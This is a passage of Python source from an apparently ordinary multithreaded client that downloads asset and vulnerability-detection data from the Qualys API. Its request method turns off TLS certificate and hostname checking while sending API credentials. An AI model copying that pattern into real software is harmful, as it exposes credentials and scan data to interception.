- startTime, 2) def post(self, url, data = None, response = None, **kwargs): """Sends a POST request. Returns :class:APIResponse object. :param url: URL for the new :class:APIRequest object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:APIRequest. :param \*\*kwargs: Optional arguments that ``call_api`` takes. :return: APIResponse """ return self.call_api( method = 'POST', api_route = url, data = data, response = response, **kwargs) def get(self, url = None, data = None, response = None, **kwargs): """Sends a POST request. Returns :class:APIResponse object. :param url: URL for the new :class:APIRequest object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:APIRequest. :param \*\*kwargs: Optional arguments that ``call_api`` takes. :return: APIResponse """ return self.call_api( method = 'GET', api_route = url, data = data, response = response, **kwargs) def makeHash(self, value = None): """ Return a hashed string, given an input. :param name: String value to encode :return: String hash """ value = str(value) + str(randint(10000, 99999)) result = _md5(str(value).encode('utf-8')) hash = result.hexdigest() return hash def call_api(self, api_route = None, data = None, method = None, response = None, filename = None, **kwargs): """ This method does the actual API call. Returns response or raises an Exception. Does not support proxy at this moment. :param api_route: (str) full url to make a request to :param data: (optional) file-like object to send in the body of the :class:APIRequest :param method: HTTP method to make the :class:APIRequest :param response: Class of the Response Handler :param kwargs: Optional Arguments :return: APIResponse """ ids = None retrycount = 0 hash = self.makeHash(int(time.time())) request = None # Enable http level debugging if in debug mode # urllib HTTP debug logging uses print, so will go to stdout # i.e: httplib.HTTPResponse#_read_status(): # if self.debuglevel > 0: # print "reply:", repr(line) http_handler = HTTPSHandlerWithKeepAlive(debuglevel = self.config.debug) opener = build_opener(http_handler) install_opener(opener) # Prepare request prepared = APIRequest( type = method, username = self.config.username, password = self.config.password, data = data, api_route = api_route, hash = hash) req = prepared.build_request() while True: try: # Previous attempt failed, retry with exponential backoff if retrycount > 0: logHandler.dynamicLogger(self.logMessages.message(RETRY), sleep = (30 + (2 ** retrycount)), count = retrycount) time.sleep(30 + (2 ** retrycount)) prepared.hash = self.makeHash(int(time.time())) req = prepared.build_request() starttime = time.time() # Log Request details if not self.config.debug and isinstance(data, dict): # Create a copy, to remove the ids parameter for logging datacopy = copy.deepcopy(data) loglevel = DEBUG if 'ids' in datacopy: del datacopy['ids'] datacopy = '&'.join("%s=%r" % (key, val) for (key, val) in datacopy.items()) datacopy = datacopy.replace("'", "") else: datacopy = data if not isinstance(data, dict): datacopy = "<XML Post Data>" loglevel = INFO msg = LOGPROXYCALL if self.config.useProxy is True else LOGCALL logHandler.dynamicLogger( self.logMessages.message(msg) + " Request Hash: %s" % prepared.hash, url = api_route, params = datacopy, loglevel = loglevel) # Make Request ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE request = urlopen(req, timeout = self.timeout, context = ctx) # Send response to XMLFileBufferedResponse class for handling response.response = request duration = self.callDuration(startTime = starttime) if not response.get_response(): logHandler.dynamicLogger("Error during Fetching for Request Hash: %s, Cleaning up and retrying", hash, logLevel = DEBUG) keep_running = True self.cleanup(response.file_name) retrycount += 1 continue # received, parsed, and saved response. Log its size, # and return. logHandler.dynamicLogger( self.logMessages.message(GOTRESPONSE), status = request.getcode(), duration = duration, hash = prepared.hash) self.receivedBytes += response.totalSize return response # Handle the different exceptions that can occur. Unless explicitly # told to stop, retry forever. # FIXME - Make retries configurable, both by max retries, and types # of exceptions to bail on. except (URLError, HTTPError, HTTPException) as ue: retrycount += 1 if isinstance(ue.reason, HTTPException): context = HTTPEXCEPTION else: context = None # Exception handling for the various http codes/reasons returned shouldretry = logHandler.checkException( exception = ue, request = req, response = response, context = context, retrycount = retrycount, NoRetryCodes = self.config.NoRetryCodes, hash = prepared.hash) self.renameFile(filename, filename + ".errored", hash = prepared.hash) if request is not None: self.closeConn(request) if shouldretry: continue else: logHandler.dynamicLogger('Not Retrying, hit unretriable exception: %s', ue) break except ssl.SSLError as e: retrycount += 1 context = 'SSLError' traceback = None shouldretry = logHandler.checkException(exception = e, request = req, response = response, context = context, retrycount = retrycount, NoRetryCodes = self.config.NoRetryCodes, hash = prepared.hash) self.renameFile(filename, filename + ".errored", hash = prepared.hash) if request is not None: self.closeConn(request) if shouldretry: continue else: break except IOError as e: # This will occur if something happens while iterating through the chunked response being written # to file. Usually it means either a problem writing to disk, # or a transient error occurred (Connection Timeout, Connection Reset) import traceback retrycount += 1 duration = self.callDuration(startTime = starttime) logHandler.dynamicLogger(self.logMessages.message(IOERROR), duration = duration, url = req.get_full_url() if req is not None else None, traceback = traceback.format_exc(), exception = e, retrycount = retrycount, hash = prepared.hash) self.renameFile(filename, filename + ".errored", hash = prepared.hash) if request is not None: self.closeConn(request) continue # FIXME Catchall for edge cases - include traceback to find out why it wasn't caught # Remove once these no longer occur, or its no longer needed. except Exception as e: import traceback retrycount += 1 endtime = time.time() totaltime = endtime - starttime logHandler.dynamicLogger( self.logMessages.message(UNHANDLEDEXCEPTION), duration = totaltime, url = req.get_full_url() if req is not None else None, traceback = traceback.format_exc(), exception = e, retrycount = retrycount, hash = prepared.hash) self.renameFile(filename, filename + ".errored", hash = prepared.hash) if request is not None: self.closeConn(request) break def get_asset_ids_portal(self): """This method will fetch all the host ids in single API call.""" data = '''<ServiceRequest> <filters> <Criteria field="lastVulnScan" operator="GREATER">%s</Criteria> </filters> <preferences> <startFromId>1</startFromId> <limitResults>0</limitResults> </preferences> </ServiceRequest>''' % self.config.detectionDelta api_route = '/qps/rest/2.0/ids/am/hostdetection' asset_ids = [] host_ids = [] logHandler.dynamicLogger("Fetching asset ids from portal..") filename = self.config.outputDir + "/assets/portalasset_ids_%s_%s.xml" % ( os.getpid(), current_thread().getName()) keep_running = True while keep_running: # Make an API call and send it to XMLFileBufferedResponse self.post(self.config.baseURL + api_route, data = data, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler), filename = filename) time.sleep(5) logHandler.dynamicLogger("Wrote API response to {filename}", filename = filename) logHandler.dynamicLogger("Parsing IDs..") tree = ET.parse(filename) root = tree.getroot() response_element = root.find('data') if response_element is None: logHandler.dynamicLogger("data tag not found") else: for id_element in response_element.findall('HostDetection'): if id_element.find('id').text is not None: asset_ids.append(id_element.find('id').text) # if id_element.find('qwebHostId').text is not None: # host_ids.append(id_element.find('qwebHostId').text) keep_running = False return asset_ids def get_asset_ids(self): """This method will fetch all the host ids in single API call.""" api_route = '/api/2.0/fo/asset/host/' params = dict( action = 'list', truncation_limit = 0, vm_processed_after = self.config.detectionDelta, ) asset_ids = [] if self.config.pullbyip: roottag = 'HOST_LIST' childtag = 'HOST/IP' params['details'] = 'Basic' else: roottag = 'ID_SET' childtag = 'ID' params['details'] = 'None' logHandler.dynamicLogger("Fetching asset ids..") filename = self.config.outputDir + "/assets/asset_ids_%s_%s.xml" % ( os.getpid(), current_thread().getName()) keep_running = True while keep_running: # Make an API call and send it to XMLFileBufferedResponse self.get( self.config.baseURL + api_route, data = params, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler), filename = filename ) time.sleep(5) logHandler.dynamicLogger("Wrote API response to {filename}", filename = filename) logHandler.dynamicLogger("Parsing IDs..") tree = ET.parse(filename) root = tree.getroot() response_element = root.find('RESPONSE') if response_element is None: logHandler.dynamicLogger("RESPONSE tag not found") id_set = response_element.find(roottag) if id_set is None: logHandler.dynamicLogger("%s not found" % roottag) else: for id_element in id_set.findall(childtag): asset_ids.append(id_element.text) keep_running = False return asset_ids def vm_detection_coordinator(self, detectionQueue = None): """This method is the entry point of each detection thread. It pops out an id range entry from detection queue, and calls download_host_detections passing id range as argument. """ keep_running = True ips = None asset_ips = [] while keep_running: try: logHandler.dynamicLogger("Getting batch from detection_idset_queue") log_range = id_range = detectionQueue.get(False) if self.config.pullbyip: for i in id_range.split(','): asset_ips.append(utils.int2ip(int(i))) ips = ",".join(map(str, asset_ips)) log_range = ips logHandler.dynamicLogger("Processing batch: {idrange}", idrange = log_range, logLevel = DEBUG) self.download_host_detections(id_range, ips) detectionQueue.task_done() except queue.Empty: logHandler.dynamicLogger("detection_idset_queue is empty. Exiting.") keep_running = False def portal_assethost_coordinator(self, hostAsset = None): """This method is the entry point of each HostAsset thread. It pops out an id range entry from detection queue, and calls download_host_detections passing id range as argument. """ keep_running = True while keep_running: try: logHandler.dynamicLogger("Getting batch from HostAsset_idset_queue") id_range = hostAsset.get(False) logHandler.dynamicLogger("Processing batch: {idrange}", idrange = id_range, logLevel = DEBUG) self.download_portal_assethost(id_range) hostAsset.task_done() except queue.Empty: logHandler.dynamicLogger("HostAsset_idset_queue is empty. Exiting.") keep_running = False def chunk(self, ids): """Given a String list of Asset Ids, split them using the ',' delimiter string and then return in String range in the format of {First Entry} - {Last Entry} i.e String "1,2,3,4,5" to "1-5" :param ids: String comma-seperated list of Asset Ids :return: String Range """ chunks = ids.split(',') if self.config.pullbyip: id1 = utils.int2ip(int(chunks[0])) id2 = utils.int2ip(int(chunks[-1])) else: id1 = chunks[0] id2 = chunks[-1] idset = "%s-%s" % (id1, id2) return idset def cleanup(self, filename): """Safely remove a file :param filename: Name of file to try to delete. """ try: logHandler.dynamicLogger('Cleaning up filename: %s' % filename, logLevel = DEBUG) os.remove(filename) # pause to give OS time to remove the file time.sleep(3) except OSError: # File didnt exist, so just pass pass def renameFile(self, oldFileName, newFileName, hash = None): """Rename a filename from the given old name. :param oldFileName: (str) filename to rename from. :param newFileName: (str) filename to rename to. """ if oldFileName is None: logHandler.dynamicLogger('Filename is null.. Not renaming..') else: try: if hash is None: hash = randint(10000, 99999) newFileName = newFileName + ".%s" % hash os.rename(oldFileName, newFileName) if self.config.debug: logHandler.dynamicLogger('Renamed old file: %s to: %s' % (oldFileName, newFileName), logLevel = DEBUG) except OSError: pass def determineFilename(self, ids = None, pid = None, thread = None, batch = None, extension = None, startTime = None): """When Internal Error or Malformed exceptions are returned, api_params wont always be defined Make sure this is caught, and revert to saving to another filename with a datetime instead. :param ids: ID Range used in filename :param pid: PID used in filename :param thread: thread used in filename :param batch: batch used in filename :param extension: extension to use in filename (defaults to xml) :param startTime: a time.time() representation of when the API call started :return: String filename """ if ids is not None: filename = self.logMessages.message(FILENAMEERRORED).format( dir = self.config.tempDirectory, range = ids, pid = pid, thread = thread, batch = batch, rand = randint(10000, 99999), extension = extension) else: filename = self.logMessages.message(FILENAMEERROREDTIME).format( dir = self.config.tempDirectory, time = startTime.strftime('%Y-%m-%d-%M-%S'), pid = pid, thread = thread, batch = batch, rand = randint(10000, 99999), extension = extension) return filename def verifyResponse(self, parseresponse, filename = None, orig_filename = None ): """An HTTP response from Qualys API endpoints can be returned as a 200 Okay, and still have errors. Client Errors, and sometimes transient errors will be returned in the RESPONSE tag of the XML with the following info Tags: CODE : This contains a special code representing the specific error that occurred. A full list of error codes is located in the API User Guide. Message : This will contain a description of the error code, to give you more information as to what happened. This method will parse the response and check for those errors, and rename and move the XML file to the tmp directory to allow referencing later. :param parseresponse: parsed response from the _parse() method which will contain a dict of errors :param orig_filename: original filename :return: True if their are no errors, False otherwise. """ if "Internal Error" in parseresponse or "Internal error" in parseresponse: logHandler.dynamicLogger( "API Internal Error, Leaving File {filename}, and Retrying", filename = filename, logLevel = DEBUG) self.renameFile(oldFileName = orig_filename, newFileName = filename) return False elif "not well-formed" in parseresponse: logHandler.dynamicLogger( "Malformed XML detected in {filename}, Retrying", filename = filename, logLevel = DEBUG) self.renameFile(oldFileName = orig_filename, newFileName = filename) return False else: return True def getETA(self): """This method averages the durations for all completed threads, and estimates an ETA to complete """ allThreads = 0 for i in self.completedThreads: allThreads += i avgTime = round((allThreads / len(self.completedThreads)), 0) remainingBatches = round(self.remaining / self.config.chunkSize, 0) eta = round(((remainingBatches * avgTime) / self.config.numDetectionThreads) / 60, 2) if self.config.debug: logHandler.dynamicLogger( "completedThreads durations: {completed}, Total for all Threads: {allThreads}, " "avgTime: {avgTime}, remainingBatches: {remainingBatches}, eta: {eta} minutes, " "totalRemaining hosts: {remainingHosts}, " "totalCompleted hosts: {completedHosts}", completed = self.completedThreads, allThreads = allThreads, avgTime = avgTime, remainingBatches = remainingBatches, eta = eta, remainingHosts = self.remaining, completedHosts = self.completed, logLevel = DEBUG) return eta def download_host_detections(self, ids, asset_ips = None): """This method will invoke call_api method for asset/host/vm/detection/ API.""" api_route = '/api/2.0/fo/asset/host/vm/detection/' params = self.detectionParameters params['vm_processed_after'] = self.config.detectionDelta if asset_ips is not None: params['ips'] = asset_ips else: params['ids'] = ids batch = 1 keep_running = True file_extension = 'xml' # Convert the list of ids into a Range to use in the filename. # i.e 123456-999999 instead of 123456,123457,123458... idset = self.chunk(ids) logHandler.dynamicLogger("Downloading VM detections for batch: {idset}", idset = idset) if params['output_format'] != 'XML': file_extension = 'csv' params['truncation_limit'] = 0 while keep_running: filename = self.config.outputDir + "/vm_detections/vm_detections_Range-%s_Process-%s_%s_Batch-%d.%s" % ( idset, os.getpid(), current_thread().getName(), batch, file_extension) startTime = time.time() # Make Request response = self.get( url = self.config.baseURL + api_route, data = params, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler), filename = filename) duration = self.callDuration(startTime = startTime) self.completedThreads.append(duration) size = 0 if response.totalSize is not None: size = response.totalSize self.totalBytes = self.totalBytes + response.totalSize logHandler.dynamicLogger( "Wrote API response with {size} bytes, " "avg speed: {speed} KB/sec, " "Combined speed: {combinedSpeed} KB/sec " "API Duration: {duration}, to {filename}, " "Hosts remaining: {remaining}, " "ETA until completion: {ETA} minutes, " "Total Data received: {totalBytesreceived} MB, " "Projected Total size: {projectedTotal} MB", size = size, speed = round(response.totalSize / duration / 1000, 2), combinedSpeed = round((response.totalSize / duration / 1000) * self.config.numDetectionThreads, 2), duration = duration, remaining = self.remaining, ETA = self.getETA(), totalBytesreceived = round((self.totalBytes / 1024 / 1024), 2), projectedTotal = round( ((size * (self.remaining / self.config.chunkSize)) + self.totalBytes) / 1024 / 1024, 2), filename = filename) # API Endpoint returned data, parse it for error codes, and # completeness. Retry if needed. parsed = self._parse(filename, format = params['output_format']) vfileName = self.determineFilename(ids = idset, pid = os.getpid(), thread = current_thread().getName(), batch = batch, extension = file_extension) verified = self.verifyResponse(parseresponse = parsed, orig_filename = filename, filename = vfileName) if not verified: keep_running = True self.cleanup(filename) continue # Check if the result was truncated, and another batch needs to be retrieved # Note we can only get here after successfully receiving, parsing, and saving the result # of an API call into a file. A Missing Response XML Tag should never occur in a # VM Host Detection API call. if params['output_format'] == 'XML': if not os.path.isfile(filename): continue tree = ET.parse(filename) root = tree.getroot() response_element = root.find('RESPONSE') if response_element is None: logHandler.dynamicLogger( "RESPONSE tag not found in {filename}. Please check the file.", filename = filename, logLevel = 'error') keep_running = False warning_element = response_element.find('WARNING') if warning_element is None: keep_running = False else: next_page_url = warning_element.find('URL').text params = utils.get_params_from_url(url = next_page_url) batch += 1 def download_portal_assethost(self, ids): """This method will invoke call_api method for asset/host/vm/detection/ API.""" api_route = '/qps/rest/2.0/search/am/hostdetection' params = """<ServiceRequest> <filters> <Criteria field="id" operator="IN">%s</Criteria> <Criteria field="detection.found" operator="EQUALS">true</Criteria> <Criteria field="detection.ignored" operator="EQUALS">false</Criteria> <Criteria field="detection.disabled" operator="EQUALS">false</Criteria> <Criteria field="detection.showresults" operator="EQUALS">false</Criteria> <Criteria field="detection.typeDetected" operator="IN">4,2</Criteria> <Criteria field="detection.nonRunningKernal" operator="EQUALS">false</Criteria> </filters> <preferences> <startFromId>1</startFromId> <limitResults>%s</limitResults> </preferences> </ServiceRequest>""" % (ids, self.config.chunkSize) batch = 1 keep_running = True file_extension = 'xml' # Convert the list of ids into a Range to use in the filename. # i.e 123456-999999 instead of 123456,123457,123458... idset = self.chunk(ids) logHandler.dynamicLogger("Downloading Portal data for ids {idset}", idset = idset) while keep_running: filename = self.config.outputDir + "/portal/Portal_hostasset_Range-%s_Process-%s_%s_Batch-%d.%s" % ( idset, os.getpid(), current_thread().getName(), batch, file_extension) startTime = time.time() # Make Request response = self.post( url = self.config.baseURL + api_route, data = params, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler), filename = filename) duration = self.callDuration(startTime = startTime) self.completedThreads.append(duration) size = 0 if response.totalSize is not None: size = response.totalSize logHandler.dynamicLogger( "Wrote API response with {size} bytes, " "avg speed: {speed} kb/sec, " "API Duration: {duration}, to {filename}, " "Hosts remaining: {remaining}, " "ETA until completion: {ETA} minutes", size = size, speed = round(response.totalSize / duration / 1000, 2), duration = duration, remaining = self.remaining, ETA = self.getETA(), filename = filename) # API Endpoint returned data, parse it for error codes, and # completeness. Retry if needed. parsed = self._parse(filename) vfileName = self.determineFilename(ids = idset, pid = os.getpid(), thread = current_thread().getName(), batch = batch, extension = file_extension) verified = self.verifyResponse(parseresponse = parsed, orig_filename = filename, filename = vfileName) if not verified: keep_running = True self.cleanup(filename) continue else: keep_running = False def _parse(self, file_name, format = None): """Parse the resulting file gathered from the Qualys API Endpoint. Since error codes for incorrect parameters, and possibly transient errors can be returned, Need to double check the final XML file for error codes, and completeness. If there is a transient error, then send back for a retry, otherwise raise an Exception. :param file_name: XML file to parse :return: dict or an Exception message if applicable. """ logHandler.dynamicLogger("Parsing detection file %s" % file_name) total = 0 logged = 0 response = {'error': False} load_next_batch = False next_url = None try: context = iter(ET.iterparse(file_name, events = ('end',))) _, root = next(context) for event, elem in context: # Handle client errors if elem.tag == "RESPONSE": code = elem.find('CODE') error = elem.find('TEXT') if code is not None: logHandler.dynamicLogger( "API Client ERROR. Code={errorcode}, Message={errorText}", errorcode = code.text, errorText = error.text) elem.clear() # We dont want to retry these client errors, so raise # an Exception raise APIResponseError("API Client Error. Code=%s, Message=%s" % (code.text, error.text)) elem.clear() # Internal Errors resulting in a 999 response will be DOCTYPE # GENERIC_RETURN elif elem.tag == "GENERIC_RETURN": code = elem.find('RETURN') if code is not None: if "Internal error" in code.text: elem.clear() raise ET.ParseError("API Error - Found Internal Error. Clean up and Retry") elem.clear() elif elem.tag == 'HOST': total += 1 if self._process_root_element(elem): logged += 1 elem.clear() elif elem.tag == "WARNING": load_next_batch = True next_url = elem.find('URL') elem.clear() root.clear() except ET.ParseError as e: logHandler.dynamicLogger( "Failed to parse API Output for endpoint {endpoint}. Message: {message}", endpoint = self.config.baseURL, message = str(e), logLevel = ERROR) try: self.renameFile(oldFileName = file_name, newFileName = file_name + ".errored") except Exception as err: logHandler.dynamicLogger( "Could not rename errored xml response filename. Reason: {message}", message = str(err), logLevel = ERROR) return str(e) logHandler.dynamicLogger("Parsed %d Host entries. Logged=%d" % (total, logged)) self.remaining -= self.config.chunkSize self.completed += self.config.chunkSize return response def _process_root_element(self, elem): """Method used to parse and gather statistics on data retrieved. :param elem: XML element from iter(ET.iterparse()) :return: True or False depending on successful parsing """ host_fields_to_log = [ 'ID', 'IP', 'TRACKING_METHOD', 'DNS', 'NETBIOS', 'OS', 'LAST_SCAN_DATETIME', 'TAGS'] detection_fields_to_log = [ 'QID', 'TYPE', 'PORT', 'PROTOCOL', 'SSL', 'STATUS', 'LAST_UPDATE_DATETIME', 'LAST_FOUND_DATETIME', 'FIRST_FOUND_DATETIME', 'LAST_TEST_DATETIME'] fields_to_encode = ['OS', 'DNS', 'NETBIOS'] if elem.tag == "HOST": plugin_output = [] host_summary = [] vulns_by_type = { 'POTENTIAL': 0, 'CONFIRMED': 0 } vulns_by_status = { 'ACTIVE' : 0, 'NEW' : 0, 'FIXED' : 0, 'RE-OPENED': 0 } vulns_by_severity = {} other_stats = {} host_vuln_count = 0 host_id = None for sub_ele in list(elem): name = sub_ele.tag if name == "ID": host_id = sub_ele.text name = "HOST_ID" host_summary.append("HOST_ID=" + host_id) if name in host_fields_to_log: if name == "TAGS": host_tags = [] tag_elements = sub_ele.findall('./TAG/NAME') for tag_element in list(tag_elements): host_tags.append(tag_element.text) val = ",".join(host_tags) else: val = sub_ele.text if name in fields_to_encode: val = val.encode('utf-8') host_summary.append("%s=\"%s\"" % (name, val)) if not host_id: logHandler.dynamicLogger("Unable to find host_id", logLevel = 'error') return False host_line = ", ".join(host_summary) dl = elem.find('DETECTION_LIST') if dl is not None: for detection in list(dl): vuln_summary = [] qid_node = detection.find('QID') if qid_node is not None: host_vuln_count += 1 qid = int(qid_node.text) type = detection.find('TYPE').text.upper() status_element = detection.find('STATUS') if status_element is not None: status = detection.find('STATUS').text.upper() else: status = "-" severity = detection.find('SEVERITY') if severity is not None: severity = severity.text # else: # severity = self.get_qid_severity(qid) if severity: severity_key = 'SEVERITY_%s' % severity vuln_summary.append('SEVERITY=%s' % severity) vulns_by_severity[severity_key] = vulns_by_severity.get( severity_key, 0) + 1 if self.collect_advanced_host_summary: # Break down, count of vulns by each severity # and each status, type type_severity_key = '%s_%s' % ( type, severity_key) status_severity_key = '%s_%s' % ( status, severity_key) other_stats[type_severity_key] = other_stats.get( type_severity_key, 0) + 1 other_stats[status_severity_key] = other_stats.get( status_severity_key, 0) + 1 for sub_ele in list(detection): name = sub_ele.tag val = sub_ele.text.upper() if name == 'TYPE': vulns_by_type[val] = vulns_by_type.get( val, 0) + 1 if name == 'STATUS': vulns_by_status[val] = vulns_by_status.get( val, 0) + 1 if name in detection_fields_to_log: vuln_summary.append("%s=\"%s\"" % (name, val)) if self.log_host_detections: host_id_line = "HOSTVULN: " if not self.log_host_details_in_detection: host_id_line = "HOSTVULN: HOST_ID=%s," % host_id else: host_id_line = "HOSTVULN: %s," % host_line if self.seed_file_enabled: logHandler.dynamicLogger( "%s %s" % (host_id_line, ", ".join(vuln_summary))) if self.log_host_summary: host_summary = [ "HOSTSUMMARY: %s" % host_line, self.get_log_line_from_dict(vulns_by_severity), self.get_log_line_from_dict(vulns_by_type), self.get_log_line_from_dict(vulns_by_status)] if self.collect_advanced_host_summary: host_summary.append( self.get_log_line_from_dict(other_stats)) if plugin_output: host_summary.append(", ".join(plugin_output)) host_summary.append("TOTAL_VULNS=%s" % host_vuln_count) if self.seed_file_enabled: logHandler.dynamicLogger(", ".join(host_summary)) self.host_logged += 1 return True @staticmethod def get_log_line_from_dict(dict_obj): return ', '.join("%s=%r" % (key, val) for (key, val) in dict_obj.items()) def assets_coordinator(self, assets_idset_queue): """This method is entry point of each asset download thread. It pops out an id range entry from assets queue, and calls download_assets method passing id range as argument. :param assets_idset_queue: Queue object """ keep_running = True while keep_running: try: logHandler.dynamicLogger("Getting id set from assets_idset_queue") id_range = assets_idset_queue.get(False) logHandler.dynamicLogger("Processing id set: {idrange}", idrange = id_range) self.download_assets(id_range) assets_idset_queue.task_done() except queue.Empty: logHandler.dynamicLogger("assets_idset_queue is empty. Exiting.") keep_running = False def download_assets(self, ids): """This method will invoke call_api method for asset/host API.""" api_route = '/api/2.0/fo/asset/host/' params = dict( action = 'list', echo_request = 1, details = 'All/AGs', ids = ids, truncation_limit = 5000 ) batch = 1 logHandler.dynamicLogger("Downloading assets data..") keep_running = True while keep_running: filename = self.config.outputDir + "/assets/assets_Range-%s_Proc-%s_%s_Batch-%d.xml" % ( ids, os.getpid(), current_thread().getName(), batch) response = self.get( self.config.baseURL + api_route, params, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler)) logHandler.dynamicLogger( "Wrote API response to {filename}", filename = filename) logHandler.dynamicLogger("Parsing response XML...") tree = ET.parse(filename) root = tree.getroot() response_element = root.find('RESPONSE') if response_element is None: logHandler.dynamicLogger( "RESPONSE tag not found in {filename}. Please check the file.", filename = filename) keep_running = False warning_element = response_element.find('WARNING') if warning_element is None: logHandler.dynamicLogger("End of pagination for ids {ids}", ids = ids) keep_running = False else: next_page_url = warning_element.find('URL').text params = utils.get_params_from_url(url = next_page_url) batch += 1 def checkLimits(self): """Check the current subscription API limits to ensure we dont start too many threads """ limits = { 'x-concurrency-limit-limit' : APIResponse.responseHeaders.get('X-Concurrency-Limit-Limit', "0"), 'x-ratelimit-remaining' : APIResponse.responseHeaders.get('X-RateLimit-Remaining', "0"), 'x-concurrency-limit-running': APIResponse.responseHeaders.get('X-Concurrency-Limit-Running', "0"), 'x-ratelimit-window-sec' : APIResponse.responseHeaders.get('X-RateLimit-Window-Sec', "0") } if int(limits.get('x-concurrency-limit-limit')) < self.config.numDetectionThreads: logHandler.dynamicLogger( 'Configured number of threads: {numthreads} is higher than subscription limit of ' 'x-concurrency-limit-limit: {limit}, Please verify subscription limits and reduce ' 'configured threads to use.', numthreads = self.config.numDetectionThreads, limit = int(limits.get('x-concurrency-limit-limit'))) exit() else: logHandler.dynamicLogger( 'Configured number of threads: {numthreads}, ' 'x-concurrency-limit-limit: {limit}, ', numthreads = self.config.numDetectionThreads, limit = int(limits.get('x-concurrency-limit-limit')) ) def startThreads(self, target = None, assetids = None, ThreadName = None, Queue = None, threadcount = 0): """ :param target: is the callable object to be invoked by the Thread.run() method. Defaults to None, meaning nothing is called. :param assetids: utils.IDset split into chunks for Enqueuing :param ThreadName: is the thread name. By default, a unique name is constructed in the form "Thread-N" where N is a small decimal number. :param Queue: Queue object. :param threadcount: Total number of threads to start. :return: Thread.__repr__ - list of Threads and their status """ workers = [] batchcnt = len(assetids) if batchcnt < threadcount: threadcount = batchcnt self.config.numDetectionThreads = batchcnt logHandler.dynamicLogger("Starting {numthreads} threads for {ThreadType} download. Total batches: {cnt} ...", numthreads = threadcount, ThreadType = ThreadName, cnt = batchcnt ) for id_chunk in assetids: id_range = id_chunk.tostring() queue.Queue.put(Queue, id_range) for i in range(0, threadcount): thread = Thread(target = target, name = ThreadName + '-' + str(i), args = (Queue,)) thread.setDaemon(True) thread.start() workers.append(thread) logHandler.dynamicLogger("Started {ThreadName} thread # {threadnum}", ThreadName = ThreadName, threadnum = i) return workers def execute(self): """Main method of this code.""" startTime = time.time() self.parse_options() assetWorkers = [] detectionWorkers = [] hostAssetWorkers = [] if self.downloadHostAssets: self.id_set = self.get_asset_ids_portal() else: self.id_set = self.get_asset_ids() logHandler.dynamicLogger(self.logMessages.message(GOTASSETSRESPONSE), numids = len(self.id_set), size = self.receivedBytes) self.total_hosts = self.remaining = len(self.id_set) ids = utils.IDSet() if self.config.pullbyip: for i in self.id_set: try: # skip invalid IPv4 addresses ipaddress.IPv4Address(str(i)) ipid = utils.ip2int(i) ids.addString(str(ipid)) except (AddressValueError, NetmaskValueError): continue else: for i in self.id_set: ids.addString(i) chunks = ids.split(self.config.chunkSize) if self.downloadAssets: assetWorkers = self.startThreads( threadcount = self.config.numAssetThreads, assetids = chunks, target = self.assets_coordinator, ThreadName = 'assetsThread', Queue = queue.Queue()) if self.downloadDetections: detectionWorkers = self.startThreads( threadcount = self.config.numDetectionThreads, assetids = chunks, target = self.vm_detection_coordinator, ThreadName = 'detectionThread', Queue = queue.Queue()) if self.downloadHostAssets: hostAssetWorkers = self.startThreads( threadcount = self.config.numHostAssetThreads, assetids = chunks, target = self.portal_assethost_coordinator, ThreadName = 'hostAssetThread', Queue = queue.Queue()) workers = assetWorkers + detectionWorkers + hostAssetWorkers # Block until all threads have completed for worker in workers: worker.join() duration = self.callDuration(startTime = startTime) logHandler.dynamicLogger(self.logMessages.message(TOTALDOWNLOADED), duration = duration, bytes = self.receivedBytes, speed = round(self.receivedBytes / duration / 1000, 2), hosts = self.host_logged, batchsize = self.config.chunkSize) def parse_options(self): """This method parses all options given in command line.""" username = None password = None fmt = Formatter() description = "Multithreading for Qualys Host Detection v2 API" epilog = "Examples:\n" \ "Using a batch size of 500 hosts, with 5 threads in parallel," \ " for all hosts processed since 2019-04-01:\n\n" \ "localhost:HostDetection testuser$ python qPyMultiThread.py -u quays_nw93 -c 500 -d 5 -v 2019-04-01\n" \ " QG Password:\n" \ " 2019-04-05 20:16:07-0700 INFO: [qPyMultiThread] Validating Credentials to " \ "https://qualysapi.qualys.com/msp/about.php ...\n" \ " 2019-04-05 20:16:13-0700 INFO: [qPyMultiThread] Got response from Proxy, " \ "and msp/about.php endpoint...\n" \ " 2019-04-05 20:16:13-0700 INFO: [qPyMultiThread] Validation successful, " \ "proceeding. verifying limits\n" \ " \n\n" option = OptionParser(formatter = fmt, description = description, epilog = epilog) parser = OptionGroup(option, title = "Connection Options") parser.add_option("-s", dest = "baseURL", default = "https://qualysapi.qualys.com", help = "Qualys API Server. Defaults to US Platform 1") parser.add_option("-u", dest = "username", help = "Qualys API Username") parser.add_option("-p", dest = "password", help = "Qualys API Password") parser.add_option("-P", dest = "useProxy", default = False, help = "Enable/Disable using Proxy") parser.add_option("-x", dest = "proxyHost", default = 'None', help = "Proxy to use e.g http://localhost:3128") conf = OptionGroup(option, title = "Configuration Options") conf.add_option("-a", dest = "numAssetThreads", default = 0, help = "Number of threads to fetch host assets") conf.add_option("-d", dest = "numDetectionThreads", default = 0, help = "Number of threads to fetch host detections") conf.add_option("-z", dest = "numHostAssetThreads", default = 0, help = "Number of threads to fetch Portal HostAssets") conf.add_option("-v", dest = "detectionDelta", default = "2000-01-01", help = "Only pull Data scanned after this date.") conf.add_option("-c", dest = "chunkSize", default = 1000, help = "Batch size of Host ID chunks") conf.add_option("-i", dest = "pullbyip", default = False, action = 'store_false', help = "Enable pulling data by batches of IPs instead of host ids") conf.add_option("-D", dest = "debug", default = False, action = 'store_false', help = "Enable Debug Logging") option.add_option_group(parser) option.add_option_group(conf) (options, values) = option.parse_args() if len(sys.argv[1:]) == 0: option.print_help() exit(1) username = options.username password = options.password if username is None or username == '': username = raw_input("QG Username: ") if password is None or password == '': import getpass password = getpass.getpass("QG Password:") self.config = Configuration( username = username, password = password, baseURL = options.baseURL, useProxy = options.useProxy, proxyHost = options.proxyHost, validateURL = '/msp/about.php', numAssetThreads = int(options.numAssetThreads), numDetectionThreads = int(options.numDetectionThreads), numHostAssetThreads = int(options.numHostAssetThreads), chunkSize = int(options.chunkSize), detectionDelta = options.detectionDelta, debug = options.debug, NoRetryCodes = NORETRYCODES, key = None, pullbyip = options.pullbyip, default_settings = 